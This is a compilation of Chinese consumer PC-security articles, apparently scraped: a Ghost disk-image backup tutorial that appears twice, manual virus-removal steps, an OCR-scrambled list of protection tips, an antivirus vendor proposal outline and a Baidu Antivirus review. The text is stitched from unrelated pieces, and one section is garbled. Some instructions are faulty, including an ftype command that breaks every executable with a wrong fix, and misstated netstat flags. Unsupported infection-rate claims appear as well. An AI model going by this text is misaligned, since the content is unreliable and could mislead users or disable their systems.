制作百毒不侵电脑系统
GHOST教程图解
GHOST教程图解(从不会到精通)申精ghost是一个备份软件它能将一个分区内所有文件通常我们是将系统盘C盘制作成一个“压缩文件”存放在电脑其它安全的分区内再在系统出现任意已知或未知的问题时候再启动GHOST 提取此备份文件再还原到系统盘C盘以保证到系统正常安全运行 GHOST适用于各种操作系统但对于刚刚接触电脑用户而言使用windows98或比较容易操故而此处是以windows98 为例名词解释镜像文件此处泛指GHOST软件制作成的压缩文件以.gho 为后缀在ghost中显示为黄色源盘即将要备份的磁盘在一般的情况下我们泛指操作系统盘C盘镜像盘存放备份镜像的磁盘在一般的情况下我们泛指文件存放盘D盘或 E F G 盘打包制作镜像文件通常是指将操作系统盘C盘经压缩后存放在其它盘如D 盘里面解包还原镜像文件通常在系统盘C盘出现错误或病毒木马后将存放在其它盘里面的镜像文件还原到系统盘内以求能恢复干净良好的操作系统我在写这个网页是在一个前题下的1 针对没有软驱没有光驱没有引导光盘也不会用光盘启动的人能够在本地硬盘上简单操作就可维护好的2 针对纯windows98 系统针对FAT32的分区理论上XP或者说比98好点多但个人认为安全第一实用第一速度第一我看见过的相当多的朋友们尤其是刚刚接触电脑的人用XP的中毒率大于90% 能够在一年内平安的不出钱不需要别人维护的人小于20% 98如果用得好通常中毒的可能性等于零的也不是想像的那么容易死机的我原来用98做主机的时候也曾经有过30天以上没有关机的3 针对对电脑不是太懂或十分不懂的朋友所写的我不能要求到他们了解到各种分区格式内存交换文件休眠文件……故而 GHOST的相当多的其它功能都没有讲到仅仅只讲到了最基本最实用的部分一下要求他们了解到许多他们或者说会望而却步的只有当他们了解到了初步再在实用阶段慢慢的一步一步熟悉他们或才会一通百通的4 个人主张如无特别必要不要在系统上安装限制性的软件或系统优化软件通常都没有实际用处而通常或有副作用的通常只有RMB能够真正优化到电脑一使用GHOST之前必定要注意到的事1.在备份系统时如果您是选择的FAT32的分区格式单个的备份文件最好不要超过2GBGHOST建议您选用选用最新的版本号需要最少GHOST8.0版本或以上的版本2.在备份系统前最好将一些无用的文件删除以减少Ghost文件的体积通常无用的文件有:Windows的临时文件夹如果您不是太了解只建议您删除C:WINDOWSTEMP下面的文件镜像文件应尽量保持“干净”“基本”。
计算机病毒怎么彻底清除
计算机病毒怎么彻底清除计算机病毒能把自身附着在各种类型的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。
今天店铺给大家介绍下计算机病毒怎么彻底清除吧。
计算机病毒彻底清除方法一找到网络连接,点击禁用点击IE属性栏,找到删除键,清理IE临时文件。
点击开始关闭计算机,点击重启然后进入安全模式。
找到HLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*并检查不明启动项目并删除。
计算机病毒彻底清除方法二1、电脑一般中毒我们使用杀毒软件就可以查杀病毒,但是如果杀毒软件也感染了或者给病毒关闭了,就需要我们进行手动查杀,这里以WindowsXP给大家演示。
第一步需要做的就是先与网络断开,这样的做法是防止病毒的连接。
选择桌面的网上邻居,右键单击选择属性选项,弹出网络连接窗口。
2、选择网络连接窗口中的本地连接,右键单击选择停用(B)选项。
3、接下来进行手动查杀病毒,打开开始菜单,输入Cmd命令,打开命令提示符窗口。
4、命令提示符下输入ftype exefile=notepad.exe %1命令,命令的意思是将所有的EXE文件用“记事本”打开。
这样原来的病毒就无法启动。
5、输入以上命令之后选择开始菜单,关闭计算机(U),重新启动电脑(R)把计算机重新启动,重启完电脑之后,你会看见打开了许多“记事本”。
当然,这其中不仅有病毒文件,还有一些原来的系统文件,比如:输入法程序,之类的,意思就是所有的EXE程序都以记事本类型来打开,病毒文件也是EXE程序,所以都以记事本类型来打开了。
6、接下来我们把们把EXE文件关联还原,不然你打开任何EXE文件都是以记事本文件类型运行的,我们右键任意文件选择右建-选择打开方式-选择程序,然后浏览到c:\windows\system32\cmd.exe 文件,打开该文件。
7、打开之后我们在打开方式窗口可以看到多了个CMD文件的选项,选择CMD程序。
13妙招让你的Windows系统百毒不侵
资 料 , 看 是 不 是病 毒 。 看
6经 常 备 份 重 要 数 据 一 些 重 要 的 数 据 , 必 须 经 常 备
( ) 的 电 脑 可 能 被 挂 马 , 码 1 你 密
. 3禁 止 所 有 磁 盘 自动 运 行
如 今 U 盘 病 毒 盛 行 , 不 小 心 就 稍 会 导 致 “ 盘 ” u 盘 病 毒 一 般 的 运 行 格 。
8 隐 私 文 件 要 加 密
使 用 一 些 加 密 程 序 加 密 那 些 你 认 为 不 能 公 诸 于 众 的 文 件 , 上 有 很 网
Go ge搜 索 里 提 供 了 网 站 安 全 信 息 ol
最 好 还 安 装 一 些 监 测 网 络 进 程 的 程 序 . 刻 监 视 有 无 恶 意 程 序 在 进 行 非 时
法 操作 。
放 ” 选 择 “ 有 驱 动 器 ” 然 后 选 择 , 所 , “ 启 动 ” 确 定退 出 。 已 ,
Frfx不 是 万 能 的 。 但 总 比 I i o e E 好 , 比 起 I 使 用 Frfx能 有 效 地 相 E, i o e 降低 中毒 几率 。 l 1使 用 复 杂 的 密 码 这 是 老 生 常 谈 的 话 题 了 , 还 有 但 很 多 人 使 用 简 单 的 数 字 密 码 , 如 生 例
然 你 恢 复 系 统 盘 也 会 有 所 损 失 , 少损 至 失 了最 近 安 装 的程 序 的注 册 信 息 。
是 不 是 他 主 动 发 的 。 接 收 后 也 不 要 马 上运行 , 用杀毒 软件 扫描 一遍 。 先
如何利用系统自带命令搞定手工杀毒
如何利用系统自带命令搞定手工杀毒如何利用系统自带命令搞定手工杀毒电脑病毒看不见,却无处不在,有时防护措施不够或者不当操作都会导致病毒入侵。
电脑用户最害怕的就是一些病毒,虽然我们的电脑上安装有各种的杀毒软件,但是也抵制不了病毒的恶性侵入,下面小编教你如何自己亲自动手来用系统自带的工具绞杀病毒,快来看看吧方法步骤一、自己动手前,切记有备无患——用T askList备份系统进程新型病毒都学会了用进程来隐藏自己,所以我们最好在系统正常的时候,备份一下电脑的进程列表,当然最好在刚进入Windows时不要运行任何程序的情况下备份,样以后感觉电脑异常的时候可以通过比较进程列表,找出可能是病毒的进程。
在命令提示符下输入:TaskList /fo:csv>g:zc.csv上述命令的作用是将当前进程列表以csv格式输出到“zc.csv”文件中,g:为你要保存到的盘,可以用Excel打开该文件.二、自己动手时,必须火眼金睛——用FC比较进程列表文件如果感觉电脑异常,或者知道最近有流行病毒,那么就有必要检查一下。
进入命令提示符下,输入下列命令:TaskList /fo:csv>g:yc.csv生成一个当前进程的yc.csv文件列表,然后输入:FC g:\\zccsv g:\\yc.csy回车后就可以看到前后列表文件的不同了,通过比较发现,电脑多了一个名为“Winion0n.exe”(这里以这个进程为例)不是“Winionon.exe”的异常进程。
三、进行判断时,切记证据确凿——用Netstat查看开放端口对这样的可疑进程,如何判断它是否是病毒呢?根据大部分病毒(特别是木马)会通过端口进行对外连接来传播病毒,可以查看一下端口占有情况。
在命令提示符下输入:Netstat -a-n-o参数含义如下:a:显示所有与该主机建立连接的端口信息n:显示打开端口进程PID代码o:以数字格式显示地址和端口信息回车后就可以看到所有开放端口和外部连接进程,这里一个PID 为1756(以此为例)的进程最为可疑,它的状态是“ESTABLISHED”,通过任务管理器可以知道这个进程就是“Winion0n.exe”,通过查看本机运行网络程序,可以判断这是一个非法连接!连接参数含义如下:LISTENINC:表示处于侦听状态,就是说该端口是开放的,等待连接,但还没有被连接,只有TCP协议的服务端口才能处于LISTENINC状态。
ghost1
GHOST 使用方法图解说明 (附矮人DOS工具箱使用教程)ghost是一个备份软件它能将一个分区内所有文件通常我们是将系统盘C盘制作成一个压缩文件存放在电脑其它安全的分区内再在系统出现任意已知或未知的问题时候再启动GHOST 提取此备份文件再还原到系统盘C盘以保证到系统正常安全运行GHOST适用于各种操作系统但对于刚刚接触电脑用户而言使用windows98或比较容易操故而此处是以windows98 为例名词解释镜像文件此处泛指GHOST软件制作成的压缩文件以.gho 为后缀在ghost中显示为黄色源盘即将要备份的磁盘在一般的情况下我们泛指操作系统盘C盘镜像盘存放备份镜像的磁盘在一般的情况下我们泛指文件存放盘D盘或EF G 盘打包制作镜像文件通常是指将操作系统盘C盘经压缩后存放在其它盘如D盘里面解包还原镜像文件通常在系统盘C盘出现错误或病毒木马后将存放在其它盘里面的镜像文件还原到系统盘内以求能恢复干净良好的操作系统我在写这个网页是在一个前题下的1 针对没有软驱没有光驱没有引导光盘也不会用光盘启动的人能够在本地硬盘上简单操作就可维护好的2 针对纯windows98 系统针对FAT32的分区理论上XP或者说比98好点多但个人认为安全第一实用第一速度第一我看见过的相当多的朋友们尤其是刚刚接触电脑的人用XP的中毒率大于90% 能够在一年内平安的不出钱不需要别人维护的人小于20% 98如果用得好通常中毒的可能性等于零的也不是想像的那么容易死机的我原来用98做主机的时候也曾经有过30天以上没有关机的3 针对对电脑不是太懂或十分不懂的朋友所写的我不能要求到他们了解到各种分区格式内存交换文件休眠文件故而GHOST的相当多的其它功能都没有讲到仅仅只讲到了最基本最实用的部分一下要求他们了解到许多他们或者说会望而却步的只有当他们了解到了初步再在实用阶段慢慢的一步一步熟悉他们或才会一通百通的4 个人主张如无特别必要不要在系统上安装限制性的软件或系统优化软件通常都没有实际用处而通常或有副作用的通常只有RMB能够真正优化到电脑一使用GHOST之前必定要注意到的事1.在备份系统时如果您是选择的FAT32的分区格式单个的备份文件最好不要超过2GBGHOST建议您选用选用最新的版本号需要最少GHOST8.0版本或以上的版本2.在备份系统前最好将一些无用的文件删除以减少Ghost文件的体积通常无用的文件有:Windows的临时文件夹如果您不是太了解只建议您删除C:\\WINDOWS\\TEMP下面的文件镜像文件应尽量保持干净基本应用软件安装得越多,系统被修改得越严重安装新软件也就越容易出错所以在制作镜像文件前千万不要安装过多的应用软件建议您分层次一步一步打包系统刚刚做完安装完驱动打一个如是001 再安装一些必要的软件再打一个如是002 以后再安装了新软件再打如是003 如果安装新软件或硬件使用一时间后发现容易出错或死机的话回复到前一个版本的包后再安装新软件或硬件一定要到没有任意问题才算好的否则不可以删除前一个安全良好的包(有些朋友们硬盘空间比较小有时会为了空间删除镜像文件)通常建议您将镜像文件复制一下放在安全的地方比如说放在另外的盘里面或设置为只读或隐藏防止误删除3.在备份系统前进行磁盘碎片整理整理源盘和镜像盘,以加快备份速度4.在备份系统前及恢复系统前源盘和镜像盘进行磁盘检查错误如有修复磁盘错误系统备份之前必定要升级杀毒软件后仔细完全查杀一次毒如有可能下载好各种系统安全补丁确定系统运行得十分正常且安全再备份5.在恢复系统时最好先检查一下要恢复的目标盘是否有重要的文件还未转移目标盘上的原有数据将全部被覆盖使用任何反删除法都无法恢复我们要养成一个良好的习惯不要在系统盘C盘放任意需要保存的资料下载软件的下载默认一定要设置到D盘或其它盘里面6.在选择压缩率时建议不要选择最高压缩率因为最高压缩率非常耗时而压缩率又没有明显的提高建议选取适度压缩就是中间的一个7 通常建议电脑上保存二个或以上的镜像文件在新安装了软件和硬件后最好重新制作映像文件二软件下载安装此处以本站本地下载的Ghost为例子右击另存为或用网际快车下载下载下来后是一个自动解压缩文件双击打开点击安装2 完成后会在同一目录下出现一个名叫GHOST 的文件夹双击打开里面有六个文件3 对于我们而言有用的是那个ghost 大小1.32M其它的文件初学者可以忽略不计4 将这个文件复制到您的放文件的盘里面不能放在可能误操作的盘里面通常我们放在D盘记住直接放在D盘目录下一定不能放在中文名字的文件夹里面(在DOS下不能识别中文)5 为了便于操作将这个文件改名字通常我们改正成G三进入GHOST软件界面此处以windows98为例1 重新启动计算机2 在电脑启动时快速连续按键盘最上一排的F83 按了后会显示黑底白字的系统选项通常上面有6 个选项4 此处我们需要了解的是1 正常模式3 安全模式6 进入DOS界面5 ghost通常必须要在dos 运行因此选取6进入dos 界面按上下选择箭头选定6回车6 进入后会出现DOS提示符如C:\\> 此处意思为现在显示的是C盘7 在c:\\> 后面输入d:此处的意思为进入D盘输入后回车出现d:\\>8 再在d:\\>后面输入g此处意思为运行g程序此处的g实际上就是原有的ghost 程序9 输入后回车就会进入GHOST 的操作界面见图一附DOS 下基本操作命令每一个命令输入完毕后回车进入下一个操作1 c :进入C盘同样的道理D :进入D盘E:F:进入E盘F盘2 dir查看查看目录下面的文件如c:\\> dir 是指查看C盘里面的文件3 cd文件夹名字打开文件夹如cd 123 意思是说打开123这个文件夹4 exe是程序的意思如这ghost 改名字后为g 在dos下面就叫g.exe5 在dos下面如果要执行程序的话输入程序名字回车即可如运行g.exe 输入g 回车6 cd ..进入上一个目录如此时是c:\\>windows 是表示在C盘的windowd 中如果说此时输入cd .. 则会进入C盘屏幕上显示出c:\\>三打包制作镜像文件对于通常用户来说仅仅只是使用GHOST里的分区备份功能故此此处只讲解分区备份部分1 按上所说处理好打包前的工作(系统状况最好驱动安装好相关软件安装好清理垃圾文件磁盘查错磁盘碎片整理)后重新启动快速按F8 进入DOS界面运行G.exe2 注意:若要使用备份分区功能(如要备份C盘)必须有两个分区(最少要有C D二个分区)以上而且C盘所用容量必须大于D盘的未用容量(通常C盘用了二GB 则D盘必定要有二GB以上的空间)保证D盘上有足够的空间储存镜像同时你尽量做到少往主分区上安装不是十分必要重要的软件有相当多的工具性软件(金山快译金山词霸)可以放在D盘里面的只要在C盘里注册一下就可以了这样制作的映像文件就不会太大了但必要的软件或有重大安全性的软件如QQ MSN 杀毒软件网络游戏(必定要是能够在2GB 的镜像文件里面可以放下的)必定要放在C盘里面3 进入图一所示GHOST 界面后由于是在DOS下只能用键盘操作按回车进入下一个界面4 DOS界面下键盘操作:TAB键进行切换回车键进行确认方向键进行选择如图二用方向键选择此处操作选择菜单Local(本机)--Partition(分区)--To Image(到镜像)通俗一点说就是1-2-2先选中1再选取弹出选项2再选取弹出选项25 选中后回车将出现如图三选择硬盘此处第一次是显示的第一个硬盘的信息如果有二个硬盘的话回车后会出现二个硬盘的信息选项通常我们只一个硬盘此处操作回车6 选中后回车将出现下一个操作界面如图四选择要备份的分区通常我们是选择C盘也就是系统盘此处操作1 选择分区(可以用方向键上下选择用TAB选择项目)通常选择第一个就是C盘分区2 选定分区回车确定3 按一下TAB 再次确定回车就表示已经选定为备份C盘如果说您不能确定是不是备份的C盘建议您在WINDOWS的时候查看一下您的各个分区的大小再对照就可以知道的因此处是借鉴别的人的图所以需要到您区别一下7 选中后回车将出现如图5此处需要是输入备份文件名字此处操作1 按TAB选定到图片下面的输入名字的地方在空格内输入您确定的名字回车2 此处选择的名字为windows 当然您也可以选择别的名字的3 通常我选择的是0018 输入后回车就会进入如下所示见图6此处是提示您选择压缩模式上面共有三个选择:No表示不压缩,Fast表示适量压缩,High高压缩限于适用与速度通常我们选择适量压缩Fast此处操作1 按TAB或左右方向键选定Fast回车9 输入后回车就会进入下一操作界面见图7此处是提示您选择是否开始备份共有二个选择YES 是NO 不我们需要选定YES 此处操作1 按左右方向键选定YES回车10 输入后回车就会进入下一个操作界面见图8此处是提示GHOST根据您的指示开始备份此处操作1 此处请不要做任意动作您的任意动作都会带来不可预见之后果请1 不要按键盘2 不要关机静心等待到进度条走完11 进度条跑完后会进入到下一个操作界面见图9此处是提示GHOST根据您的指示已经备份完毕回车退出此处操作1 回车备份完毕重新启动就可以了备份的文件以GHO后缀名储存在设定的目录中如上所述您的这个文件名叫windows.gho此文件在windows界面下是不显示什么的在DOS下运行GHOST显示为黄色您的这个windows.gho保存在D盘目录下就是和G.EXE 一个目录下通常建议您将镜像文件复制一下放在安全的地方防止误删除三解包还原镜像文件要提醒您注意的是在使用GHSOT 软件恢复系统时,请勿中途中止!如果您在恢复过程中重新启动了计算机那么您的计算机将无法启动!必定要接双硬盘或用光盘系统启动才可恢复在您的系统遇到以下的情况之一怀疑或确定您的系统中了病毒或木马系统运行了半个月以上或出现无故死机变慢及相关类别您需要还原您的系统镜像文件以保证到系统的安全与良好运行1 重新启动快速按F8 进入DOS界面运行G.exe 进入GHOST界面回车2 回车后就会进入GHOST 的操作界面见图10此处操作选择菜单到Local(本机)--Partition(分区)--From Image通俗一点说就是1-2-3先选中 1 再选弹出选项2 再选项弹出选项33 选定后回车就会进入下一个操作界面见图11此处是提示您选择需要还原的镜像文件如上所述我们打的包是windows.gho 所以我们这里选择windows.gho此处操作1 按上下方向键选择好windows.gho回车4 输入后回车就会进入下一个操作界面见图12此处显示硬盘信息不需要处理直接回车此处操作1 回车5 输入后回车就会进入下一个操作界面见图13此处显示硬盘信息不需要处理直接回车如果您是双盘操作此处必定要选择好硬盘切记切记通常是选择第二块硬盘此处操作1 回车6 输入后回车就会进入下一个操作界面见图14此处显示分区信息提示您是需要还原到哪珍上分区默认是还原第一个分区也就是C盘系统盘如果您是要还原到此分区不需要处理直接回车此处操作1 回车7 输入后回车就会进入下一个操作界面见图15此处显示信息此处是为了防止误操作再次提醒您是不是一定要还原镜像文件您到了这一步如果说没有十分的把握这是最后一次机会默认是NO 按下可以退出到起始界面如果选择YES 将进行还原操作此操作到了此处已经不可逆转此处需要的是用左右方向键选择YES 回车此处操作1 用左右方向键选择YES 回车8 输入后回车就会进入GHOST 的操作界面见图16此处是提示GHST根据您的指示开始还原镜像文件此时千万不要进行操作此处操作1 此处请不要做任意动作您的任意动作都会带来不可预见之后果包括系统不能启动请1 不要按键盘2 不要关机静心等待到进度条走完9 输入后回车就会进入下一个操作界面见图17此处是提示GHST根据您的指示已经备份完毕给出的二个选择一默认为重新启动二以后再重新启动此处需要的是重新启动此处操作1 回车至此您已经成功的还原了您的系统镜像您的系统又和原来最最良好的时候是一样的了恭喜您的电脑有了百毒不侵之身有了可以防止误操作的万事无忧之方法有了以上的说明在通常的情况下您可以随时随地将您的系统还原到最良好运行之境地1 此方法适用于还原镜像的时候失败或突然停电致使系统无法启动理论上只要是可以进入DOS 界面就可以还原GHOST的2 您必定要有二个硬盘初学者建议一个硬盘一个数据线安在主板上可以进入系统就表示您选取的是好的硬盘上的系统如果进不了表示进错了盘将主板上的二个硬盘的数据线对换一下就可以了3 进入了后按上述操作说明操作要注意的是图13 的地方需要到选择第二块硬盘如果您是双盘操作此处必定要选择好硬盘切记切记通常是选择第二块硬盘请在懂电脑一点的人在身边时操作六光盘使用GHOST此操作需要到您稍稍了解电脑不建议初学者操作建议在有了解电脑的朋友在边上时操作1 此方法适用于还原镜像的时候失败或突然停电致使系统无法启动理论上只要是可以进入DOS 界面就可以还原GHOST的2 您必定要有光驱要有带启动文件的光盘最好光盘里面有GHOST 7.0以上3 在主板的启动设置里面设置成光盘启动启动后进入DOS界面4 再如上操作就可以了七XP系统使用GHOST说明此操作需要到您稍稍了解电脑不建议初学者操作建议在有了解电脑的朋友在边上时操作1 如果您是XP系统也可以使用GHOST的前题是必定要让系统能够在启动时进入纯DOS 系统2 初学者必定需要到您的C盘和放镜像文件的盘如D盘的分区格式为FAT32 如果使用则无此要求XP系统进入纯DOS 系统的方法您的系统在安装XP系统前最好是格式化时复制系统文件如果您用的FDISK分的区格式化时请选取format c: /s如果您是用的双硬盘格式化的请在复制系统文件前打对钩如果你在C盘复制了系统文件在您的XP启动的时候会有双项选择一个是进入XP 一个是进入DOS如果说您要使用GHOST 请选择MS DOS 启动选项再如上操作如果您在本机上无法操作GHOST 也可以接双硬盘或光盘做好XP系统的GHOST备份或还原如果您的XP系统不能进入纯DOS界面您可以尝试安装以下软件可以实现XP DOS 双启动您可以点击下载也可以本地下载矮人DOS工具箱4.2矮人DOS工具箱说明是为2k以上系统加上纯DOS启动支持的工具!方便没有光软驱的朋友全中文操作界面,为普通用户着想软件中已经预装有GHOST82版支持NTFS分区软件在DOS下以虚拟磁盘存在以免去NTFS文件系统不能为DOS系统所识别对初学者尤为重要此处以本站本地下载的矮人DOS工具箱4.2为例子右击另存为或用网际快车下载下载下来后是一个自动解压缩文件双击打开点击安装10 完成后会在同一目录下出现一个名叫dosgz 的文件夹双击打开里面有一个XP2Kargzs 文件夹再双击打开后出一个名叫airenDOS_4.2的安装文件11 双击安装依次点下一步我同意下一步下一步下一步直到安装完成12 查看您的磁盘是FAT32 格式还是NTFS 格式1> 显示桌面-----打开我的电脑-----找到本地磁盘C盘2> 右击C盘----选择属性---打开3> 上面会显示您的文件系统您的上面显示的为FAT32 或NTFS 盘此处是说明您的分区格式4> 不管是什么格式您必定要注意到记下来同时也需要查看一下其它磁盘格式通常是相同格式矮人DOS工具箱使用方法1 安装完成后做好所有上述备份前的工作后以及上述需要注意到的事情详细请查看上面所说一使用GHOST之前必定要注意到的事处请仔细查看2 确定您C盘所有重要文件都已经备份到其它磁盘确定您的存放镜像文件的磁盘空间够用(最少要有C盘的所有已用文件空间大)确定您已经知道您磁盘文件系统格式为FAT32 或NTFS 确定您已经做好相关准备工作3 重新启动计算机4 在您进入系统之前在黑底白字之时会在您的屏幕最上面会出现二个系统启动选项一为WINDOWSXP 正常启动二为下面的我的DOS工具箱5 选择进入我的DOS工具箱进入后会有中文菜单选择,主要是前两项,1矮人工作室DOS工具盘2GHOST 8.2 向导工具盘到了此处都是全中文操作界面您应当说能理解此处此时是选择GHOST 8.2 向导工具盘6 GHOST工具盘进入后有多个选项如下图备份操作1 一键备份系统支持NTFS (如果您的文件系统为NTFS格式请选择此项)3 全自动备份系统仅FAT32 (如果您的文件系统为FAT32格式请选择此项)选择后会有中文提示如图此处通常是选择第一个硬盘如有需要也可以安装双硬盘后备份到第二个硬盘上选择第一个硬盘后会出现下一个操作界面如图按此所说意思可能为您的系统盘将被制作为镜像文件文件名字为bak.gho默认存放在D盘的目录下您可以进入了WINDOWS后查找到此文件的不要移动此文件或文件夹还原操作此处意思或为经过您一键备份了系统后您的镜像文件bak.gho备份在了D盘指定目录下此时软件直接从指定目录中提取此镜像文件来还原系统盘C盘2 一键恢复系统支持NTFS (如果您的文件系统为NTFS格式请选择此项)4 全自动恢复系统仅FAT32 (如果您的文件系统为FAT32格式请选择此项)5 启动GHOST82版手工操作如果您选此选项您将直接进入到GHOST82 您可以按以上所说操作您的系统备份和还原切切需要记住的是必定要记住放置和还原镜像文件的地方看清盘符了再操作使用TAB键选择6 7 二项不建议初学者使用八使用电脑上已有的GHOST镜像文件还原系统通常做系统的师付在与您做系统的时候一般都做了系统备份的只是没有与你说清楚罢了但或您每次电脑出了问题他都或以在几分钟内最多半小时内给你重新装好系统(如果可能您可以要求师付与您做一个GHOST镜像文件)其实不然真正做好一个系统没有三五个小时是难做好的通常他们都是还原了GHOST镜像文件而GHOST 对于初学者来说还原镜像远比制作镜像文件容易得多您可以通过查找您的电脑上的*.gho开始----查找-----文件或文件夹就会跳出一个查找所有文件名称在名称后面的空白处输入*.gho3 找到下面的搜索点中后面的下行键选中本地硬盘驱动器(C:,D:) 开始查找GHOST 镜像文件如果您的电脑上可以找到这就表示您的系统是备份过了的如图186 注意到此文件通常比较大最初的镜像文件通常在370M上下如果说后来不断的备份的话此文件会加大如果是您的最新打的包此文件或为您的C盘已经使用了的容量的一半或稍大一点7 找到此文件后将此文件复制到您的GHOST程序目录下如GHOST在D盘下此文件也要复制到D盘下不能放在文件夹内尤其是不是放在中文名字的文件夹内切记切记如是XP系统切记要您存放镜像文件的盘的分区格式为FAT32格式8 再在您的系统出现任意问题后请您按上面所说仔细操作一下最好多实习一下如果没有到最后现YES的地方都可以取消操作的实习后确定无误了您到操作一下大不了再同您以前一下出钱让人上门维护一下九使用别的电脑上的GHOST镜像文件还原您的系统如果您的电脑上没有备份而您不会做或者说有朋友们有比较好的系统或朋友们系统里有比较好的软件或大软件您也可以使用他人的电脑上的GHOST镜像文件来还原您的系统的1 建议您将您的电脑上的所有驱动全部放在您的D盘或E盘建议所有的朋友们在您新电脑买回家后装系统的第一件事必定要将您的电脑上的随机光盘随机软件所有必要的软件的安装文件切记必定要是安装文件用光驱拷在您的电脑硬盘上此为电脑装机第一步不要怕麻烦一定要注意此操作前您必定要找到您的网卡驱动找到您的网卡驱动通常的是8139 您需要下载如不能确定请多下载几个网卡驱动2 您的电脑上必定要有您的系统安装文件切记如您是WIN98系统必定要在硬盘上保留一个WIN98的安装文件3 复制人家的电脑上的GHOST镜像文件到您的电脑上您可以通过网络或双硬盘拷上去切切需要记住的是如果您是使用的别人的电脑上的XP系统GHOST 必定要作相关处理不然不能启动详细方法请您必定要4 下载GHOST 软件再将此GHOST镜像文件同放在D或E盘目录不能放在文件夹内尤其是不是放在中文名字的文件夹内切记切记如是XP系统初学者切记要您存放镜像文件的盘的分区格式为FAT32格式F87 按了后会显示黑底白字的系统选项通常上面有6 个选项8 此处我们需要了解的是1 正常模式3 安全模式6 进入DOS界面按上下方向键选定3 进入安全模式9 进入安全模式后桌面四周会显示安全模式选中桌面上的我的电脑右击---- 属性会跳出一个系统属性的框10 选中最左上的设备管理器默认为按类型查看设备11 找到里面的声音视频和游戏控制器网络适配器显示适配器双击打开将所有弹出的子选项全部删除14 重新启动计算机15 进入系统后系统会自动找到新硬件自动安装如果系统找不到的就需要您手动指向驱动的地方16 如果您的电脑上的驱动完备通常可以正常安装完所有的驱动如果有的没有请上网后在驱动之家里面找到安装17 有时可能出现安装驱动时候死机蓝屏的现像此或为几个驱动冲突而引的此时需要到您重新启动计算机----快速按F8----进入系统启动选项---选取3 进入安全模式----进入桌面通常的系统更新如在正常模式下无法更新而安全模式下可以的更新的更新后再正常启动18 安装完成后重新启动确定您的系统完好再按以上所述制作一个镜像文件。
企业级防病毒解决方案
网络版防病毒安全方案趋势科技(中国)有限公司2011年X月1. XXX信息化建设现状 (3)1.1 XXX网络及应用基本情况 (3)1.2 XXX主要安全问题 (3)1.2.1 防病毒软件零散没有统一应用 (3)1.2.2 现有网络版防毒系统功能不够全面 (3)1.2.3 现有网络版防毒系统可操控性差 (3)1.2.4 不具备安全策略控制能力 (4)1.2.5 防毒服务不到位 (4)1.3 来自互联网的威胁不断激增 (4)2. 病毒防治建设要求 (5)3. 防病毒系统建设 (6)3.1 防病毒体系设计思路 (6)3.2 网络防病毒部署架构 (6)3.3 网络版防病毒软件O FFICE S CAN简介 (7)3.4 详细部署介绍 (9)3.4.1 网络版系统需求 (9)3.4.2 网络版部署方式 (13)3.4.3 网络版管理方式 (13)3.4.4 网络版升级方式 (14)3.5 趋势O FFICESCAN产品优势 (14)3.6 权威评测报告 (16)4. 趋势科技标准服务 (17)4.1 服务对象 (17)4.2 服务提供者 (17)4.3 服务提供方式 (17)4.4 服务内容 (17)5.附录1:关于趋势科技 (19)6.附录2:趋势科技中国研发中心 (20)7.附录3:趋势科技的整体优势 (23)1.XXX信息化建设现状1.1XXX网络及应用基本情况XXX业务基本情况和信息化建设现状.1.2XXX主要安全问题随着XXX最近几年网络应用的快速发展和具有黑客攻击特征的新类型病毒的大量出现,原有的防毒措施已经不能很好满足XXX网络系统的需要,突出表现在如下几个方面:1.2.1防病毒软件零散没有统一应用整个XXX都没有统一部署防病毒软件,各个单位自行建设,没有统一部署和统一管理,桌面计算机的病毒防护能力相对较低。
最终导致病毒、木马软件、间谍软件、僵尸程序等恶意程序经过一机多用,U盘使用,网络共享等方式悄无声息的入侵到网络和计算机中来。
教你制作百毒不侵的超强系统
教你制作百毒不侵的超强系统1、安装系统后(包括GhostXP),首先把所有分区都转化成NTFS格式,很重要哦。
不要说不会啊,就是单击开始按钮——>;运行.输入"convert c:/fs:ntfs ",可以把C盘转换成NTFS格式,不过要重启才能转换哦,其它盘就把C:改成相应的盘符就行了.2、在控制面板中打开"用户帐号",将Administrator修改密码,尽量复杂些,不一定要记得.再创建一个计算机管理员用户和受限用户,管理员用户一定要密码,且也要复杂一些,这个密码要记住.因为以后装软件,游戏要用上.当然,记不住可以在DOS下改.3、设置好后,进入创建的计算机管理员用户,打开“我的电脑”,单击“工具”——>;“文件夹选项”,点击第二个选项卡“查看”,把里面的“使用简单文件共享(推荐)”前的勾去掉。
这个是以后打开文件夹或文件的属性时会出现“安全”选项卡。
4、把所有分区属性的“安全”选项卡中“users”用户去掉。
这是它默认有一个特殊权限,可以在分区下或文件夹内创建文件夹。
再可以创建或保存文件,这可能给病毒可乘之机。
所以去掉。
还有一个是“everyone".也去掉。
添加创建的受限用户进去,权限是”只读”。
5、个别文件的权限问题:象QQ、游戏都需要完全权限,所以在计算机管理员用户中要给受限用户完全权限。
QQ最好把与QQ程序在一起的文件给只读权限,防止木马替换QQ及相关的DLL文件。
6、在“运行”中输入“REGEDIT”,打开注册表,把里面的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]或[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce]的权限设为只读。
防止病毒利用此处启动。
百度杀毒,百毒不侵?
百度杀毒,百毒不侵?作者:来源:《计算机应用文摘》2013年第07期有竞争才会有进步,去年360进入搜索领域,和百度战了个风生水起,抢走了不少市场份额。
现在,风水轮流转,百度也迂回到360最擅长的杀毒领域,发布了属于自己的杀毒软件。
那么,百度的杀毒软件(以下简称“百度杀毒”)的能力到底如何,能不能做到传说中的“百毒不侵”呢?百度杀毒初体验虽然百度杀毒已经正式的发布了,但是这款杀毒软件却是针对国外用户的,所以暂时只有英文版本可以使用。
首先,登录其官方网站(http:///en),下载安装包。
通过网页的介绍可以看到,百度杀毒支持32位和64位的WinXP、Vista、Win7和Win8系统。
通过对百度杀毒的安装包我们发现,它的体积只有11.2 MB,相较于其他国产杀毒软件来说是非常小的。
下载完毕后即可进行安装,过程和其它软件并没有差别,根据向导就可以很快的完成。
而且,安装界面没有捆绑其他的相关软件,这一点做得很不错。
安装完成后就可以使用了,软件的操作界面非常简洁,除了三个不同功能的杀毒命令,并没有其他多余的按钮(如图1)。
经过测试发现,虽然软件是英文的,但仍然可以在中文系统中正常运行。
如果你实在不喜欢英文界面的话,也可以试试看网友制作的汉化包。
首先下载最新的汉化包(下载地址:http://tinyurl. com/b3lmfeh)待用,接着打开百度杀毒的操作界面,点击右上角齿轮图形的“设置”按钮。
